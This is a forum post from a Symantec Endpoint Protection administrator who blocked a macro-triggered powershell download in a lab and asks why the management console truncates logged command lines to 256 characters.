Today threats are downloaded by execution of powershell. Some of scripts create new object System.Net.WebClient and execute method DownloadFile.
I have created Application and Device Control polisy with rule to prevent runing powershell from cmd.exe.
In lab environment I have run a threat (xls file with macro).
SEP did block the execution of powershell and logged the powershell command.
In SEP -> View Logs -> Client Managment -> View Logs -> Control Log. Command/script have more than 500 characters. Example: setting value of variable with some parts of System.NetWebClient, and finally joining them with Invoke-Expression.
In SEPM console in Monitors -> Logs -> Application and Device Control Logs: Application Control in View Logs the Description has only 256 characters :(
The central information did not match with the same information in SEP. Command is truncated.
Kliknij i przeciągnij, by przenieść.
I have checked the documentation about SEPM database schema and in table AGENT_BEHAVIOR_LOG_1 column DESCRIPTION type is nvarchar(256). Can this column keep more data (future release of SEPM)?
Regards,
Tomasz